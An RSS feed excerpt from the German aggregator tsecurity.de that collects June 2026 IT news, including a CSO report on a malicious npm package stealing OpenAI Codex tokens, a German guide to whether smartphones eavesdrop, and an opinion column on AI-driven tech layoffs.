<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AI-driven exploitation timelines are rapidly shrinking, and they are not going to stop shrinking. Vulnerabilities are being discovered, reproduced, and weaponized faster than ever in the history of enterprise security. As a result, the window between a vulnerability being disclosed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ai-driven-exploitation-is-destroying-vulnerability-management-heres-how-to-handle-it/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ai-driven-exploitation-is-destroying-vulnerability-management-heres-how-to-handle-it/">AI-Driven Exploitation is Destroying Vulnerability Management. Here’s How to Handle It.</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Attack targeting OpenAI Codex users exposes AI software supply chain risks]]></title>
<description><![CDATA[A malicious npm package posing as a remote user interface for OpenAI Codex exfiltrated developer authentication tokens, after attackers allegedly published code to npm that was not visible in the project’s public GitHub repository.



Researchers at Aikido said the package, called codexui-android...]]></description>
<link>https://tsecurity.de/de/3565636/it-security-nachrichten/attack-targeting-openai-codex-users-exposes-ai-software-supply-chain-risks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565636/it-security-nachrichten/attack-targeting-openai-codex-users-exposes-ai-software-supply-chain-risks/</guid>
<pubDate>Tue, 02 Jun 2026 12:08:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A malicious npm package posing as a remote user interface for OpenAI Codex exfiltrated developer authentication tokens, after attackers allegedly published code to npm that was not visible in the project’s public GitHub repository.</p>



<p>Researchers at <a href="https://www.aikido.dev/blog/codex-remote-ui-steals-ai-tokens" target="_blank" rel="noreferrer noopener">Aikido</a> said the package, called codexui-android, appeared to offer legitimate functionality while collecting authentication tokens and sending them to an external server.</p>



<p>“AI developer tooling is becoming a high-value target precisely because the tokens are powerful and long-lived,” Aikido said. “A stolen Codex refresh_token goes beyond access to a chat interface — it’s persistent, silent access to whatever that account can do.”</p>



<p>Aikido said the incident reflected a broader pattern in which attackers build credible and useful projects as cover for malicious activity.</p>



<p>“The legitimacy is the attack vector,” Aikido said. “As AI tools proliferate and developers reach for productivity shortcuts, expect more of this.”</p>



<p>The case exposes what some security experts describe as a growing blind spot in software <a href="https://www.csoonline.com/article/4154550/supply-chain-security-is-now-a-board-level-issue-heres-what-csos-need-to-know.html">supply chain security</a>, where controls often focus on source code rather than the software artifacts ultimately distributed to users.</p>



<p>The incident showed how attackers can use legitimate-looking projects to hide malicious activity, said <a href="https://www.linkedin.com/in/sunilvarkey1/" target="_blank" rel="noreferrer noopener">Sunil Varkey</a>, cybersecurity advisor and a former CISO. “In this case, the npm package looked completely legitimate: it had an active GitHub repository, useful features for OpenAI Codex users, and attracted around 27,000 weekly downloads,” Varkey said. “Yet the malicious code that stole sensitive tokens only appeared in the published version, not in the public source code.”</p>



<p>Varkey said the risk was widened by a companion Android app that automatically pulled and executed the malicious npm package at runtime.</p>



<p>“Most companies have great security tools for their source code, but the build and distribution pipelines are still total blind spots,” said <a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="noreferrer noopener">Devashri Datta</a>, a cybersecurity researcher. “If an attacker leaves their public GitHub repository completely clean but injects malware directly into the npm package, standard code audits won’t catch a thing.”</p>



<p>Datta said enterprises should verify both the provenance of software packages and the consistency between published artifacts and their public source code, warning that seemingly benign source code may not accurately reflect what developers ultimately install.</p>



<h2 class="wp-block-heading">The enterprise risk</h2>



<p>For enterprises, the concern is less the package itself than the level of access now attached to <a href="https://www.csoonline.com/article/4136476/shai-hulud-style-npm-worm-hits-ci-pipelines-and-ai-coding-tools.html">AI developer tools</a>.</p>



<p>Aikido said the package stole access tokens, refresh tokens, ID tokens, and account IDs, with the refresh token posing particular risk because it does not expire. According to <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005665" target="_blank" rel="noreferrer noopener">Sakshi Grover</a>, senior research manager for IDC Asia Pacific Cybersecurity Services, this means a single successful exfiltration translates into persistent, silent access to everything that the account can reach.</p>



<p>Grover pointed to IDC forecasts that by 2028, half of enterprises deploying agentic AI across Asia Pacific excluding Japan will require an AI bill of materials to support continuous vulnerability scanning, license risk management, and compliance assurance. She said the codexui-android incident illustrates why organizations need better visibility into the components used by AI tools and the credentials those tools can access.</p>



<p>“Most organizations still lack a complete inventory of what their AI tools can access, what credentials they inherit, and what external services they interact with,” Grover added. “Most enterprises have not yet applied the same least-privilege and behavioral monitoring disciplines to AI tools that they apply to human identities, and that asymmetry is what attackers are now actively exploiting.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Attack targeting OpenAI Codex users exposes AI software supply chain risks]]></title>
<description><![CDATA[A malicious npm package posing as a remote user interface for OpenAI Codex exfiltrated developer authentication tokens, after attackers allegedly published code to npm that was not visible in the project’s public GitHub repository.



Researchers at Aikido said the package, called codexui-android...]]></description>
<link>https://tsecurity.de/de/3565620/ai-nachrichten/attack-targeting-openai-codex-users-exposes-ai-software-supply-chain-risks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565620/ai-nachrichten/attack-targeting-openai-codex-users-exposes-ai-software-supply-chain-risks/</guid>
<pubDate>Tue, 02 Jun 2026 12:03:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A malicious npm package posing as a remote user interface for OpenAI Codex exfiltrated developer authentication tokens, after attackers allegedly published code to npm that was not visible in the project’s public GitHub repository.</p>



<p>Researchers at <a href="https://www.aikido.dev/blog/codex-remote-ui-steals-ai-tokens" target="_blank" rel="noreferrer noopener">Aikido</a> said the package, called codexui-android, appeared to offer legitimate functionality while collecting authentication tokens and sending them to an external server.</p>



<p>“AI developer tooling is becoming a high-value target precisely because the tokens are powerful and long-lived,” Aikido said. “A stolen Codex refresh_token goes beyond access to a chat interface — it’s persistent, silent access to whatever that account can do.”</p>



<p>Aikido said the incident reflected a broader pattern in which attackers build credible and useful projects as cover for malicious activity.</p>



<p>“The legitimacy is the attack vector,” Aikido said. “As AI tools proliferate and developers reach for productivity shortcuts, expect more of this.”</p>



<p>The case exposes what some security experts describe as a growing blind spot in software <a href="https://www.csoonline.com/article/4154550/supply-chain-security-is-now-a-board-level-issue-heres-what-csos-need-to-know.html">supply chain security</a>, where controls often focus on source code rather than the software artifacts ultimately distributed to users.</p>



<p>The incident showed how attackers can use legitimate-looking projects to hide malicious activity, said <a href="https://www.linkedin.com/in/sunilvarkey1/" target="_blank" rel="noreferrer noopener">Sunil Varkey</a>, cybersecurity advisor and a former CISO. “In this case, the npm package looked completely legitimate: it had an active GitHub repository, useful features for OpenAI Codex users, and attracted around 27,000 weekly downloads,” Varkey said. “Yet the malicious code that stole sensitive tokens only appeared in the published version, not in the public source code.”</p>



<p>Varkey said the risk was widened by a companion Android app that automatically pulled and executed the malicious npm package at runtime.</p>



<p>“Most companies have great security tools for their source code, but the build and distribution pipelines are still total blind spots,” said <a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="noreferrer noopener">Devashri Datta</a>, a cybersecurity researcher. “If an attacker leaves their public GitHub repository completely clean but injects malware directly into the npm package, standard code audits won’t catch a thing.”</p>



<p>Datta said enterprises should verify both the provenance of software packages and the consistency between published artifacts and their public source code, warning that seemingly benign source code may not accurately reflect what developers ultimately install. The enterprise risk</p>



<p>For enterprises, the concern is less the package itself than the level of access now attached to <a href="https://www.csoonline.com/article/4136476/shai-hulud-style-npm-worm-hits-ci-pipelines-and-ai-coding-tools.html">AI developer tools</a>.</p>



<p>Aikido said the package stole access tokens, refresh tokens, ID tokens, and account IDs, with the refresh token posing particular risk because it does not expire. According to <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005665" target="_blank" rel="noreferrer noopener">Sakshi Grover</a>, senior research manager for IDC Asia Pacific Cybersecurity Services, this means a single successful exfiltration translates into persistent, silent access to everything that the account can reach.</p>



<p>Grover pointed to IDC forecasts that by 2028, half of enterprises deploying agentic AI across the Asia Pacific, excluding Japan, will require an AI bill of materials to support continuous vulnerability scanning, license risk management, and compliance assurance. She said the codexui-android incident illustrates why organizations need better visibility into the components used by AI tools and the credentials those tools can access.</p>



<p>“Most organizations still lack a complete inventory of what their AI tools can access, what credentials they inherit, and what external services they interact with,” Grover added. “Most enterprises have not yet applied the same least-privilege and behavioral monitoring disciplines to AI tools that they apply to human identities, and that asymmetry is what attackers are now actively exploiting.”</p>



<p><em>The article originally appeared on <a href="https://www.csoonline.com/article/4179815/attack-targeting-openai-codex-users-exposes-ai-software-supply-chain-risks.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s the Best Way to Setup the New Google Health App]]></title>
<description><![CDATA[The new Google Health app has not arrived without controversy. Not only did the app kill off the Fitbit app, it brought with it a major UI overhaul to an app that so many had grown familiar and comfortable with after years of use. Thankfully, enough users have shared their feedback with Google th...]]></description>
<link>https://tsecurity.de/de/3563510/it-nachrichten/heres-the-best-way-to-setup-the-new-google-health-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563510/it-nachrichten/heres-the-best-way-to-setup-the-new-google-health-app/</guid>
<pubDate>Mon, 01 Jun 2026 17:17:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The new Google Health app has not arrived without controversy. Not only did the app kill off the Fitbit app, it brought with it a major UI overhaul to an app that so many had grown familiar and comfortable with after years of use. Thankfully, enough users have shared their feedback with Google that they...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/06/01/heres-the-best-way-to-setup-the-new-google-health-app/">Here’s the Best Way to Setup the New Google Health App</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Belauscht Ihr Handy Sie heimlich? So einfach finden Sie das jetzt heraus]]></title>
<description><![CDATA[Wenn Sie ein Smartphone besitzen, haben Sie wahrscheinlich schon einmal ein unheimliches, aber nur allzu häufiges Szenario erlebt: Eines Tages sprechen Sie über ein beliebiges Thema, während Ihr Telefon neben Ihnen liegt, und am nächsten Tag bemerken Sie, dass Anzeigen zum selben Thema auftauchen...]]></description>
<link>https://tsecurity.de/de/3556876/it-nachrichten/belauscht-ihr-handy-sie-heimlich-so-einfach-finden-sie-das-jetzt-heraus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556876/it-nachrichten/belauscht-ihr-handy-sie-heimlich-so-einfach-finden-sie-das-jetzt-heraus/</guid>
<pubDate>Fri, 29 May 2026 13:47:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Wenn Sie ein Smartphone besitzen, haben Sie wahrscheinlich schon einmal ein unheimliches, aber nur allzu häufiges Szenario erlebt: Eines Tages sprechen Sie über ein beliebiges Thema, während Ihr Telefon neben Ihnen liegt, und am nächsten Tag bemerken Sie, dass Anzeigen zum selben Thema auftauchen. Das ist beunruhigend. Woher wissen diese Anzeigen, worüber Sie gesprochen haben?</p>



<p>Ihr Smartphone könnte der Übeltäter sein. Bei jedem Smartphone ist das eingebaute Mikrofon ständig eingeschaltet, damit der virtuelle Assistent Ihre Sprachbefehle hören kann. Könnte es also sein,<a href="https://www.pcwelt.de/article/2449573/hoeren-smartphones-alles-neue-beweise-active-listening.html" target="_blank" rel="noreferrer noopener"> dass diese Geräte auch heimlich Ihre Gespräche belauschen, um Ihnen Werbung zu zeigen? </a>Hier finden Sie alles, was Sie dazu wissen müssen, und einen einfachen Test, um das herauszufinden.</p>



<h2 class="wp-block-heading">So finden Sie heraus, ob Ihr Telefon Sie abhört</h2>



<p>Um zu testen, ob Ihr Telefon Ihre Gespräche abhört, beginnen Sie damit, offen über ein einzigartiges Thema zu sprechen, nach dem Sie noch nie gesucht oder über das Sie noch nie gesprochen haben, während Ihr Telefon neben Ihnen eingeschaltet ist. Es ist wichtig, dass es sich um ein Thema handelt, das nichts mit Ihren üblichen Interessen oder Suchanfragen zu tun hat.</p>



<p>Diskutieren Sie ein oder zwei Tage lang laut über dieses Thema, während Ihr Telefon die ganze Zeit neben Ihnen liegt. Achten Sie darauf, dass Sie auf keinem Ihrer Geräte – nicht nur auf Ihrem Telefon – nach diesem Thema suchen.</p>



<p>Sie können auch versuchen, über bestimmte Dinge zu sprechen, die mit diesem Thema zu tun haben. Wenn Sie zum Beispiel über eine Reise nach Spanien sprechen, können Sie darüber reden, wie Sie Spanisch lernen oder welches das beste Restaurant für Paella in Madrid ist.</p>



<p>Achten Sie in dieser Zeit genau auf die Werbung, die Ihnen online angezeigt wird: Anzeigen in sozialen Medien, auf Websites, die Sie besuchen, in Apps, die Sie verwenden, und auf Ihrem Smart TV, wenn Sie einen haben. Wenn Sie dann Werbung zu dem Thema sehen, über das Sie sprechen möchten, haben Sie den Lauschangriff wahrscheinlich bestätigt und Ihr Telefon auf frischer Tat ertappt.</p>



<h2 class="wp-block-heading">Das können Sie tun, wenn Sie glauben, dass Ihr Telefon lauscht</h2>



<p>Bevor Sie das Mikrofon und die Kamera Ihres Telefons abkleben oder es in einen See werfen, gibt es ein paar weniger drastische Maßnahmen, die Sie ergreifen können, um den möglichen Lauschangriff einzudämmen.</p>



<p>Als Erstes sollten Sie die App-Berechtigungen auf Ihrem Gerät sorgfältig überprüfen. Es ist wahrscheinlich, dass Sie eine App heruntergeladen und ihr den Zugriff auf Ihr Mikrofon erlaubt haben, ohne es zu bemerken. Überprüfen Sie die Berechtigungen für jede App auf Ihrem Telefon und schränken Sie Apps ein, die keinen Zugriff auf Ihr Mikrofon, Ihre Kamera oder Ihre Standorteinstellungen benötigen.</p>



<p>Als Nächstes löschen Sie den Sprachverlauf und deaktivieren den digitalen Assistenten Ihres Telefons. Google, Siri und Alexa sind alle sehr praktisch, aber sie könnten aktiv (und passiv) alles aufzeichnen, was Sie sagen, ohne dass Sie es merken.</p>



<p>Im Jahr 2024 <a href="https://www.404media.co/heres-the-pitch-deck-for-active-listening-ad-targeting/" target="_blank" rel="noreferrer noopener">berichtete 404 Media</a>, dass ein Drittanbieter namens Cox Media Group (CMG), der die Technologie “Active Listening” anbietet, mit Unternehmen wie Amazon, Google und Microsoft zusammenarbeitet.</p>



<p>Diese Unternehmen haben zwar inzwischen dementiert, dass sie diese Technologie zum Ausspionieren von Handynutzern einsetzen, aber Tatsache ist, dass es diese Möglichkeiten gibt, und es wäre töricht anzunehmen, dass die Unternehmen diese Möglichkeiten nicht nutzen würden, um effektiver bei den Verbrauchern zu werben – schließlich machen sie den größten Teil ihrer Einnahmen mit Werbung.</p>



<p>Auch wenn Unternehmen die wahrscheinlichste Quelle für Lauschangriffe sind, besteht immer die Möglichkeit, dass Hacker Schwachstellen auf Ihrem Gerät ausnutzen <a href="https://www.pcwelt.de/article/2628595/decken-sie-ihre-computerkamera-ab-vergessen-sie-nicht-diesen-wichtigen-zusatzlichen-schritt-zum-schutz-ihrer-privatsphare.html" target="_blank" rel="noreferrer noopener">und die Kontrolle über das Mikrofon oder die Kamera übernehmen.</a> Der beste Weg, dies zu verhindern, besteht darin, sicherzustellen, dass Sie immer die neuesten Updates für das Betriebssystem Ihres Telefons und alle installierten Apps haben.</p>



<p>Alle diese Schritte helfen Ihnen, den unerwünschten Zugriff auf das Mikrofon Ihres Telefons zu unterbinden, aber wenn Sie immer noch unsicher sind, gibt es eine einfache Lösung. Schalten Sie Ihr Telefon einfach aus oder lassen Sie es liegen, wenn Sie private Dinge besprechen wollen. Das ist der beste Weg, um sicherzustellen, dass Ihr Telefon Sie nicht hören kann.</p>



<h2 class="wp-block-heading">Wenn Ihr Telefon nicht zuhört, wie kommt es dann an Ihre Daten?</h2>



<p>Auch wenn die Aussicht, dass Ihr Telefon ständig alle Ihre Gespräche belauscht, beunruhigend sein mag, gibt es doch unzählige Möglichkeiten, wie Sie dieselben Informationen preisgeben können, ohne sie jemals laut auszusprechen.</p>



<p>Jedes Smartphone ist eine wahre Fundgrube an persönlichen Daten, aus der alle Apps schöpfen können. Sie sind im Grunde Minicomputer, die mit Sensoren vollgepackt sind: Gyroskope, Beschleunigungsmesser, Magnetometer und so ziemlich jedes andere Messgerät, das Sie sich vorstellen können. Die von diesen Sensoren gesammelten Daten können eine schockierende Menge an Informationen über unsere Routinen, Gewohnheiten und Persönlichkeiten liefern. </p>



<p>Wo immer Sie sich aufhalten, mit welchen Menschen Sie sprechen oder Zeit verbringen, welche Lebensgewohnheiten Sie haben und persönliche Gesundheitsdaten sind nur einige der Metadaten und Telemetriedaten, die von Ihrem Telefon gesammelt werden. Ganz zu schweigen von all den riesigen Datenmengen, die Sie im Laufe der Jahre bereits an Ihre Apps und über Google-Suchen weitergegeben haben. </p>



<p>Ihr Telefon und die installierten Apps sammeln all diese Daten und senden sie an Dritte wie z.B. Datenbroker, um sie zu analysieren, zu verkaufen und Ihnen in Form von personalisierter Werbung wiederzugeben. </p>



<p>Auch wenn Sie vielleicht nicht über die oben erwähnte Reise nach Spanien gesprochen oder danach gesucht haben, hat Ihr Telefon vielleicht erraten, was Sie gedacht haben, und ist anhand der gesammelten Daten von selbst zu diesem Schluss gekommen. Vielleicht haben Ihre Freunde neben Ihnen nach spanischen Airbnb-Wohnungen gesucht, vielleicht haben Sie eine Sprachlern-App heruntergeladen und vor kurzem angefangen, Spanisch zu lernen, oder vielleicht zeigen Ihre Einkaufstrends, dass Sie in letzter Zeit vermehrt Safran und Jamón gekauft haben.</p>



<p>Alle diese Metadaten könnten der Grund für die unheimlich relevanten Anzeigen sein, die Sie sehen. Auch wenn Ihr Telefon wirklich mithören könnte, sind es vielleicht nur die unausgesprochenen Daten, die Sie auf andere Weise weitergeben, die Sie verraten.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>Lesen Sie weiter:</strong> <a href="https://www.pcwelt.de/article/1817297/hort-whatsapp-heimlich-mit-so-finden-sie-es-heraus.html" target="_blank" rel="noreferrer noopener">Hört Whatsapp heimlich mit? So finden Sie es heraus</a></p>
</blockquote>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mac Saying ChatGPT is Malware? Here’s Why & How to Fix It]]></title>
<description><![CDATA[A fair number of people who use the ChatGPT app for Mac have recently run into a strange and alarming malware message when attempting to open and use ChatGPT. The error says that “Malware Blocked and Moved to Trash” and informs the user that “ChatGPT.app was not opened because it contains malware...]]></description>
<link>https://tsecurity.de/de/3555233/ios-mac-os/mac-saying-chatgpt-is-malware-heres-why-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555233/ios-mac-os/mac-saying-chatgpt-is-malware-heres-why-how-to-fix-it/</guid>
<pubDate>Thu, 28 May 2026 20:24:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A fair number of people who use the ChatGPT app for Mac have recently run into a strange and alarming malware message when attempting to open and use ChatGPT. The error says that “Malware Blocked and Moved to Trash” and informs the user that “ChatGPT.app was not opened because it contains malware. The action did ... <a class="read-more" href="https://osxdaily.com/2026/05/28/mac-saying-chatgpt-is-malware-heres-why-how-to-fix-it/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI tech job slaughter gets real]]></title>
<description><![CDATA[Tech companies seem to be falling over each other these days in firing people to either replace them with AI or to pay to build AI infrastructure. Wouldn’t it be nice if they at least waited until AI actually worked for business?



On the one hand, top tech businesses such as Amazon, Block, Cisc...]]></description>
<link>https://tsecurity.de/de/3550097/ai-nachrichten/the-ai-tech-job-slaughter-gets-real/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550097/ai-nachrichten/the-ai-tech-job-slaughter-gets-real/</guid>
<pubDate>Wed, 27 May 2026 09:03:44 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Tech companies seem to be falling over each other these days in firing people to either replace them with AI or to pay to build AI infrastructure. Wouldn’t it be nice if they at least waited until AI actually worked for business?</p>



<p>On the one hand, top tech businesses such as Amazon, Block, Cisco, Cloudflare, and Meta have all announced that they’re slashing payrolls — either because AI can do the same work as people or they need the cash to build out their AI infrastructure. Isn’t that great? All together, of the <a href="https://asia.nikkei.com/business/technology/artificial-intelligence/nearly-80-000-tech-jobs-cut-in-q1-but-ai-s-full-impact-may-be-yet-to-come" target="_blank" rel="noreferrer noopener">37,638 tech job cuts so far this year</a>, 47.9% — almost half —  can be tracked back to AI. </p>



<p>On the other hand, despite all the AI hype and hysteria, no one has yet proven that AI is, generally speaking, really all that helpful for businesses. Oh, I know, I know. You did great things with OpenClaw vibe programming. Microsoft’s CEO, Satya Nadella, claims <a href="https://www.cnbc.com/2025/04/29/satya-nadella-says-as-much-as-30percent-of-microsoft-code-is-written-by-ai.html" target="_blank" rel="noreferrer noopener">20% to 30% of the company’s code was written by AI</a>. And Nvidia assures us that 88% of its surveyed customers report AI has increased their revenues. </p>



<p>But really, what else would they say? “Dear Board, we just blew half a billion bucks on Nvidia GPUs, and we’re losing money hand over fist?” I don’t think so.</p>



<p>The truth is, as an IDC study reports, a mind-boggling <a href="https://www.cio.com/article/3850763/88-of-ai-pilots-fail-to-reach-production-but-thats-not-all-on-it.html" target="_blank">88% of proof-of-concept AI projects</a> never reach production. Lest we forget, <a href="https://mlq.ai/media/quarterly_decks/v0.1_State_of_AI_in_Business_2025_Report.pdf" target="_blank" rel="noreferrer noopener">MIT’s The GenAI Divide: State of AI in Business 2025 study</a> found that 95% of AI projects fail to deliver measurable P&amp;L impact. </p>



<p>Now, I have to acknowledge that AI is finally becoming truly helpful in business. As a guy who knows a thing or two about programming, Linus Torvalds, creator of Linux and Git, said at <a href="https://events.linuxfoundation.org/open-source-summit-north-america/" target="_blank" rel="noreferrer noopener">Open Source Summit North America</a>, “I’m personally 100% convinced that AI is changing programming.” He estimates that “<a href="https://www.zdnet.com/article/linus-torvalds-has-a-love-hate-relationship-with-ai/" target="_blank" rel="noreferrer noopener">AI will increase your productivity by a factor of 10.</a>” </p>



<p>But is that reason enough to slash make workforce cuts of between 10% to 40%? (Short answer: No. Longer answer: Noooo!)</p>



<p>It’s not just the mass firings. Workers who are either awaiting the axe, or have escaped it for the moment, are miserable. As one Meta employee told <em>The San Francisco Standard</em>, “<a href="https://sfstandard.com/pacific-standard-time/2026/05/15/meta-employee-gets-real-horror-working-right-now/">I tend to cry in the shower,</a>” and, “A lot of my feelings about my job are about the general chaos and not just the layoffs. ” </p>



<p>So, explain this to me: When everyone knows AI-driven layoffs are coming, exactly how well do you expect them to work? You really think they can give their best? </p>



<p>Making matters worse, it’s an open secret that IBM, Google, and Meta are <a href="https://www.nytimes.com/2026/05/08/technology/meta-ai-employees-miserable.html?unlocked_article_code=1.kFA.f6GX.u-tcjhX93xFC&amp;smid=url-share" target="_blank" rel="noreferrer noopener">having their employees train their AI replacements.</a> As a popular meme puts it, workers are now “building your own coffin.” Is it any wonder that a lot of people — 29% of all employees and 44% among Gen Z workers —  <a href="https://go.writer.com/ai-adoption-enterprise-2026" target="_blank" rel="noreferrer noopener">are deliberately sabotaging work</a> when the boss insists they train their AI replacements?</p>



<p>It also sure doesn’t help office morale when the CEO keeps saying AI will replace half of all employees. A particularly egregious example of this was when Standard Chartered CEO Bill Winters proclaimed his bank would slash thousands of jobs and <a href="https://www.wsj.com/finance/banking/ceo-walks-back-comment-about-replacing-lower-value-human-capital-with-ai-15bdfc5c?" target="_blank" rel="noreferrer noopener">replace “lower-value human capital” with AI.</a>  </p>



<p>He’s since backed off the claim, but come on — we all know he meant it. Just like all the other CEOs who’ve said similar things, between FOMO and the knowledge that AI job news is sure to make the stock price jump, they’re eager to cut headcounts and boast about how successful AI will make them. </p>



<p>What happens a few quarters down the road? Their attitude today seems to be let  tomorrow take care of tomorrow. I hate to tell them, but that really doesn’t work in the long run. (Not, mind you, that a future much farther ahead than the next quarter seems to matter much anymore to business executives.)</p>



<p>It should. As a recent Deloitte study stated: “Most respondents reported achieving <a href="https://www.deloitte.com/nl/en/issues/generative-ai/ai-roi-the-paradox-of-rising-investment-and-elusive-returns.html" target="_blank" rel="noreferrer noopener">satisfactory ROI on a typical AI use case within two to four years.</a> This is significantly longer than the typical payback period of 7seven to 12 months expected for technology investments. Only 6% reported payback in under a year, and even among the most successful projects, just 13% saw returns within 12 months.” </p>



<p>AI, in short, is not the miracle cure for what ails businesses that its fans claim. </p>



<p>Will that stop businesses? I doubt it. While I appreciate that California Gov., Gavin Newsom is trying to bandage the AI job bleedout by mandating studies on subsidizing companies to <a href="https://www.nytimes.com/2026/05/21/technology/newsom-ai-executive-order-california.html?unlocked_article_code=1.kFA.j4LN.krEJK5m_2bch&amp;smid=url-share" target="_blank" rel="noreferrer noopener">keep employees rather than replace them with AI</a>, I doubt that will do much to staunch the wound. </p>



<p>At the Open Source Summit North America, Linux Foundation CEO Jim Zemlin was optimistic about AI and jobs. He pointed out that, thanks to AI becoming  “pretty damn good coders,” the number of open-source projects on GitHub has led to a “surge of new code and projects.” </p>



<p>Zemlin also believes that while few developers will write code, “engineers will still design, review, secure, and integrate that code.” (He’s referring to what’s becoming  known as <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html" data-type="link" data-id="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">forward-deployed engineers</a>.) This, in turn, will supposedly lead to tech job growth. </p>



<p>I’d feel a lot better about that prediction if I believed the C-suite suits at most companies were capable of truly forward-looking thinking rather than focusing entirely on hiking the stock price by making the next quarter look good through staffing cuts. </p>



<p>In the long run, sure, AI will make us more productive. But, we’re not there yet. For now, companies need to keep employees happy, not shove AI down their throats — and work out carefully and thoughtfully how AI will really work for business. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s huge MacBook Pro overhaul is coming soon, here’s what we know]]></title>
<description><![CDATA[Apple just released a MacBook Pro update in March, but there’s more coming soon. Apple is expected to debut one of its biggest MacBook Pro updates ever as soon as later this year. Here’s everything we know so far.



 more…]]></description>
<link>https://tsecurity.de/de/3548340/ios-mac-os/apples-huge-macbook-pro-overhaul-is-coming-soon-heres-what-we-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548340/ios-mac-os/apples-huge-macbook-pro-overhaul-is-coming-soon-heres-what-we-know/</guid>
<pubDate>Tue, 26 May 2026 16:42:14 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2025/10/Apple-MacBook-Pro-14-in-front-251015.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p>Apple just <a href="https://9to5mac.com/2026/03/03/apple-launches-new-macbook-pro-with-m5-pro-and-m5-max-chips/">released</a> a <a href="https://geni.us/BdCqil">MacBook Pro update</a> in March, but there’s more coming soon. Apple is expected to debut one of its biggest MacBook Pro updates ever as soon as later this year. Here’s everything we know so far.</p>



 <a data-layer-pagetype="post" data-layer-postcategory="mac,macbook-pro" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1048009" href="https://9to5mac.com/2026/05/26/apples-huge-macbook-pro-overhaul-is-coming-soon-heres-what-we-know/#more-1048009" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Built My First ETL Pipeline as a Complete Beginner. Here’s How.]]></title>
<description><![CDATA[A beginner's honest walkthrough of Extract, Transform, Load using the GitHub API
The post I Built My First ETL Pipeline as a Complete Beginner. Here’s How. appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3546112/ai-nachrichten/i-built-my-first-etl-pipeline-as-a-complete-beginner-heres-how/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546112/ai-nachrichten/i-built-my-first-etl-pipeline-as-a-complete-beginner-heres-how/</guid>
<pubDate>Mon, 25 May 2026 19:47:54 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A beginner's honest walkthrough of Extract, Transform, Load using the GitHub API</p>
<p>The post <a href="https://towardsdatascience.com/i-built-my-first-etl-pipeline-as-a-complete-beginner-heres-exactly-how/">I Built My First ETL Pipeline as a Complete Beginner. Here’s How.</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[8 IT modernization traps CIOs must avoid]]></title>
<description><![CDATA[With cloud migration, digital transformation, and now the drive for AI adoption, CIOs face a real imperative to get modernization right.



However, industry research continues to show that modernization projects can fail to deliver the promised benefits and suffer cost overruns, even as the appe...]]></description>
<link>https://tsecurity.de/de/3545319/it-nachrichten/8-it-modernization-traps-cios-must-avoid/</link>
